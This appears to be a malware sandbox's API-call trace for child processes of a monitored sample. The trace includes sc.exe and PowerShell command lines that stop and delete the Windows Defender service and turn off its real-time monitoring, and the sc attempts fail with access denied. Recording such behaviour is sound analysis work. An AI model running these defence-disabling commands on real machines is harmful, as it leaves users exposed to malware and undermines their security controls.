	[0027.359] UpdateProcThreadAttribute (in: lpAttributeList=0x2bf584, dwFlags=0x0, Attribute=0x60001, lpValue=0x2bf644, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2bf584, lpPreviousValue=0x0) returned 1
	[0027.359] GetStartupInfoW (in: lpStartupInfo=0x2bf540 | out: lpStartupInfo=0x2bf540*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0027.359] GetProcessHeap () returned 0x390000
	[0027.359] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x18) returned 0x3a2f00
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0027.359] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0027.360] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0027.360] GetProcessHeap () returned 0x390000
	[0027.360] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a2f00 | out: hHeap=0x390000) returned 1
	[0027.360] GetProcessHeap () returned 0x390000
	[0027.360] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0xa) returned 0x39d5f8
	[0027.361] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1
	[0027.362] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc  delete WinDefend", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\2XC7u663GxWc\\Desktop", lpStartupInfo=0x2bf5e0*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="sc  delete WinDefend", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2bf62c | out: lpCommandLine="sc  delete WinDefend", lpProcessInformation=0x2bf62c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdc0, dwThreadId=0xdc4)) returned 1
	[0027.375] CloseHandle (hObject=0x4c) returned 1
	[0027.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0027.375] GetProcessHeap () returned 0x390000
	[0027.375] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a1e48 | out: hHeap=0x390000) returned 1
	[0027.375] GetEnvironmentStringsW () returned 0x3a1e48*
	[0027.375] GetProcessHeap () returned 0x390000
	[0027.375] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x98e) returned 0x3a04a0
	[0027.375] FreeEnvironmentStringsW (penv=0x3a1e48) returned 1
	[0027.375] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0
	[0027.818] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2bf520 | out: lpExitCode=0x2bf520*=0x5) returned 1
	[0027.818] CloseHandle (hObject=0x50) returned 1
	[0027.818] _vsnwprintf (in: _Buffer=0x2bf668, _BufferCount=0x13, _Format="%08X", _ArgList=0x2bf52c | out: _Buffer="00000005") returned 8
	[0027.819] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000005") returned 1
	[0027.819] GetProcessHeap () returned 0x390000
	[0027.819] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a04a0 | out: hHeap=0x390000) returned 1
	[0027.819] GetEnvironmentStringsW () returned 0x3a3078*
	[0027.819] GetProcessHeap () returned 0x390000
	[0027.819] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x9b4) returned 0x3a04a0
	[0027.819] FreeEnvironmentStringsW (penv=0x3a3078) returned 1
	[0027.819] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0027.819] GetProcessHeap () returned 0x390000
	[0027.819] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x3a04a0 | out: hHeap=0x390000) returned 1
	[0027.819] GetEnvironmentStringsW () returned 0x3a3078*
	[0027.819] GetProcessHeap () returned 0x390000
	[0027.819] RtlAllocateHeap (HeapHandle=0x390000, Flags=0x8, Size=0x9b4) returned 0x3a04a0
	[0027.819] FreeEnvironmentStringsW (penv=0x3a3078) returned 1
	[0027.819] GetProcessHeap () returned 0x390000
	[0027.819] HeapFree (in: hHeap=0x390000, dwFlags=0x0, lpMem=0x39d5f8 | out: hHeap=0x390000) returned 1
	[0027.819] DeleteProcThreadAttributeList (in: lpAttributeList=0x2bf584 | out: lpAttributeList=0x2bf584) 
	[0027.819] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.819] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0027.819] _get_osfhandle (_FileHandle=1) returned 0x7
	[0027.819] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0741ac | out: lpMode=0x4a0741ac) returned 1
	[0027.820] _get_osfhandle (_FileHandle=0) returned 0x3
	[0027.820] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0741b0 | out: lpMode=0x4a0741b0) returned 1
	[0027.820] SetConsoleInputExeNameW () returned 0x1
	[0027.820] GetConsoleOutputCP () returned 0x1b5
	[0027.820] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a074260 | out: lpCPInfo=0x4a074260) returned 1
	[0027.820] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.820] exit (_Code=5) 

Process:
	id = "5"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee176e0"
	os_pid = "0xdc0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "4"
	os_parent_pid = "0xd94"
	cmd_line = "sc  delete WinDefend"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 11
	os_tid = 0xdc4

	[0027.559] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fed0 | out: lpSystemTimeAsFileTime=0x28fed0*(dwLowDateTime=0xfcef1360, dwHighDateTime=0x1d50a69)) 
	[0027.559] GetCurrentProcessId () returned 0xdc0
	[0027.559] GetCurrentThreadId () returned 0xdc4
	[0027.559] GetTickCount () returned 0xa601d7
	[0027.559] QueryPerformanceCounter (in: lpPerformanceCount=0x28fec8 | out: lpPerformanceCount=0x28fec8*=10139722838) returned 1
	[0027.559] GetModuleHandleA (lpModuleName=0x0) returned 0x210000
	[0027.560] __set_app_type (_Type=0x1) 
	[0027.560] __p__fmode () returned 0x770231f4
	[0027.560] __p__commode () returned 0x770231fc
	[0027.560] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2179c7) returned 0x0
	[0027.560] __wgetmainargs (in: _Argc=0x219020, _Argv=0x219028, _Env=0x219024, _DoWildCard=0, _StartInfo=0x219034 | out: _Argc=0x219020, _Argv=0x219028, _Env=0x219024) returned 0
	[0027.561] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0027.562] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0027.562] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8
	[0027.562] _wcsicmp (_String1="delete", _String2="query") returned -13
	[0027.562] _wcsicmp (_String1="delete", _String2="queryex") returned -13
	[0027.562] _wcsicmp (_String1="delete", _String2="start") returned -15
	[0027.563] _wcsicmp (_String1="delete", _String2="pause") returned -12
	[0027.563] _wcsicmp (_String1="delete", _String2="interrogate") returned -5
	[0027.563] _wcsicmp (_String1="delete", _String2="control") returned 1
	[0027.563] _wcsicmp (_String1="delete", _String2="continue") returned 1
	[0027.563] _wcsicmp (_String1="delete", _String2="stop") returned -15
	[0027.563] _wcsicmp (_String1="delete", _String2="config") returned 1
	[0027.563] _wcsicmp (_String1="delete", _String2="description") returned -7
	[0027.563] _wcsicmp (_String1="delete", _String2="failure") returned -2
	[0027.563] _wcsicmp (_String1="delete", _String2="privs") returned -12
	[0027.563] _wcsicmp (_String1="delete", _String2="failureflag") returned -2
	[0027.563] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16
	[0027.563] _wcsicmp (_String1="delete", _String2="sidtype") returned -15
	[0027.563] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12
	[0027.563] _wcsicmp (_String1="delete", _String2="qc") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="qdescription") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="qfailure") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="qprivs") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="showsid") returned -15
	[0027.563] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="querylock") returned -13
	[0027.563] _wcsicmp (_String1="delete", _String2="lock") returned -8
	[0027.563] _wcsicmp (_String1="delete", _String2="delete") returned 0
	[0027.563] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xcf110
	[0027.568] OpenServiceW (hSCManager=0xcf110, lpServiceName="WinDefend", dwDesiredAccess=0x10000) returned 0x0
	[0027.568] GetLastError () returned 0x5
	[0027.568] _itow (in: _Dest=0x5, _Radix=2686432 | out: _Dest=0x5) returned="5"
	[0027.568] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x219380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13
	[0027.576] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x28fdc8, nSize=0x2, Arguments=0x28fdd4 | out: lpBuffer="ୈ\r༄ \x03") returned 0x33
	[0027.730] GetFileType (hFile=0x7) returned 0x2
	[0027.730] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28fd9c | out: lpMode=0x28fd9c) returned 1
	[0027.731] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xd0b48*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x28fdb8, lpReserved=0x0 | out: lpBuffer=0xd0b48*, lpNumberOfCharsWritten=0x28fdb8*=0x33) returned 1
	[0027.731] LocalFree (hMem=0xd0b48) returned 0x0
	[0027.731] LocalFree (hMem=0x0) returned 0x0
	[0027.731] CloseServiceHandle (hSCObject=0xcf110) returned 1
	[0027.798] exit (_Code=5) 

Thread:
	id = 15
	os_tid = 0xddc


Process:
	id = "6"
	image_name = "sc.exe"
	filename = "c:\\windows\\system32\\sc.exe"
	page_root = "0x7ee17700"
	os_pid = "0xdc8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0xd78"
	cmd_line = "sc  stop WinDefend"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 12
	os_tid = 0xdcc

	[0027.525] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fd38 | out: lpSystemTimeAsFileTime=0x12fd38*(dwLowDateTime=0xfcea50a0, dwHighDateTime=0x1d50a69)) 
	[0027.525] GetCurrentProcessId () returned 0xdc8
	[0027.525] GetCurrentThreadId () returned 0xdcc
	[0027.525] GetTickCount () returned 0xa601b8
	[0027.525] QueryPerformanceCounter (in: lpPerformanceCount=0x12fd30 | out: lpPerformanceCount=0x12fd30*=10136278312) returned 1
	[0027.525] GetModuleHandleA (lpModuleName=0x0) returned 0x210000
	[0027.525] __set_app_type (_Type=0x1) 
	[0027.525] __p__fmode () returned 0x770231f4
	[0027.525] __p__commode () returned 0x770231fc
	[0027.525] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x2179c7) returned 0x0
	[0027.525] __wgetmainargs (in: _Argc=0x219020, _Argv=0x219028, _Env=0x219024, _DoWildCard=0, _StartInfo=0x219034 | out: _Argc=0x219020, _Argv=0x219028, _Env=0x219024) returned 0
	[0027.526] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0027.528] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0027.528] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0027.528] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23
	[0027.528] _wcsicmp (_String1="stop", _String2="query") returned 2
	[0027.528] _wcsicmp (_String1="stop", _String2="queryex") returned 2
	[0027.528] _wcsicmp (_String1="stop", _String2="start") returned 14
	[0027.528] _wcsicmp (_String1="stop", _String2="pause") returned 3
	[0027.528] _wcsicmp (_String1="stop", _String2="interrogate") returned 10
	[0027.528] _wcsicmp (_String1="stop", _String2="control") returned 16
	[0027.528] _wcsicmp (_String1="stop", _String2="continue") returned 16
	[0027.528] _wcsicmp (_String1="stop", _String2="stop") returned 0
	[0027.528] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3ef108
	[0027.584] OpenServiceW (hSCManager=0x3ef108, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x0
	[0027.584] GetLastError () returned 0x5
	[0027.584] _itow (in: _Dest=0x5, _Radix=1244112 | out: _Dest=0x5) returned="5"
	[0027.584] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x219380, nSize=0x400, Arguments=0x0 | out: lpBuffer="Access is denied.\r\n") returned 0x13
	[0027.586] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x12fbb8, nSize=0x2, Arguments=0x12fbc4 | out: lpBuffer="ୀ?\x01") returned 0x33
	[0027.586] GetFileType (hFile=0x7) returned 0x2
	[0027.587] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12fb8c | out: lpMode=0x12fb8c) returned 1
	[0027.587] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3f0b40*, nNumberOfCharsToWrite=0x33, lpNumberOfCharsWritten=0x12fba8, lpReserved=0x0 | out: lpBuffer=0x3f0b40*, lpNumberOfCharsWritten=0x12fba8*=0x33) returned 1
	[0027.587] LocalFree (hMem=0x3f0b40) returned 0x0
	[0027.588] LocalFree (hMem=0x0) returned 0x0
	[0027.588] CloseServiceHandle (hSCObject=0x3ef108) returned 1
	[0027.733] exit (_Code=5) 

Thread:
	id = 14
	os_tid = 0xdd8


Process:
	id = "7"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x7ee176c0"
	os_pid = "0xdd0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0xd6c"
	cmd_line = "powershell  Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 13
	os_tid = 0xdd4

	[0029.605] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0029.876] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0029.876] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0029.876] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0029.876] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0032.994] GetVersionExW (in: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0032.994] GetLastError () returned 0x2
	[0032.996] GetVersionExW (in: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0032.996] GetLastError () returned 0x2
	[0033.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e41c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.002] GetLastError () returned 0x2
	[0033.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.009] GetLastError () returned 0x2
	[0033.009] GetVersionExW (in: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x190b70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0033.009] GetLastError () returned 0x2
	[0033.010] SetErrorMode (uMode=0x1) returned 0x1
	[0033.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25e8b8 | out: lpFileInformation=0x25e8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0033.015] GetLastError () returned 0x2
	[0033.015] SetErrorMode (uMode=0x1) returned 0x1
	[0033.082] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25e93c | out: lpdwHandle=0x25e93c) returned 0x94c
	[0033.090] GetLastError () returned 0x0
	[0033.091] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1fc4d8c | out: lpData=0x1fc4d8c) returned 1
	[0033.094] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e908, puLen=0x25e904 | out: lplpBuffer=0x25e908*=0x1fc4e28, puLen=0x25e904) returned 1
	[0033.097] lstrlenW (lpString="䅁") returned 1
	[0033.189] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc4f04, puLen=0x25e880) returned 1
	[0033.190] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0033.192] lstrcpyW (in: lpString1=0x190b58, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0033.192] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc4f58, puLen=0x25e880) returned 1
	[0033.192] lstrlenW (lpString="System.Management.Automation") returned 28
	[0033.192] lstrcpyW (in: lpString1=0x190b58, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0033.192] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc4fb4, puLen=0x25e880) returned 1
	[0033.192] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0033.192] lstrcpyW (in: lpString1=0x190b58, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0033.192] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc4ff4, puLen=0x25e880) returned 1
	[0033.192] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0033.192] lstrcpyW (in: lpString1=0x190b58, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc505c, puLen=0x25e880) returned 1
	[0033.193] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0033.193] lstrcpyW (in: lpString1=0x190b58, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc50f8, puLen=0x25e880) returned 1
	[0033.193] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0033.193] lstrcpyW (in: lpString1=0x190b58, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0033.193] VerQueryValueW (in: pBlock=0x1fc4d8c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25e884, puLen=0x25e880 | out: lplpBuffer=0x25e884*=0x1fc515c, puLen=0x25e880) returned 1
	[0033.193] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0033.193] lstrcpyW (in: lpString1=0x190b58, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
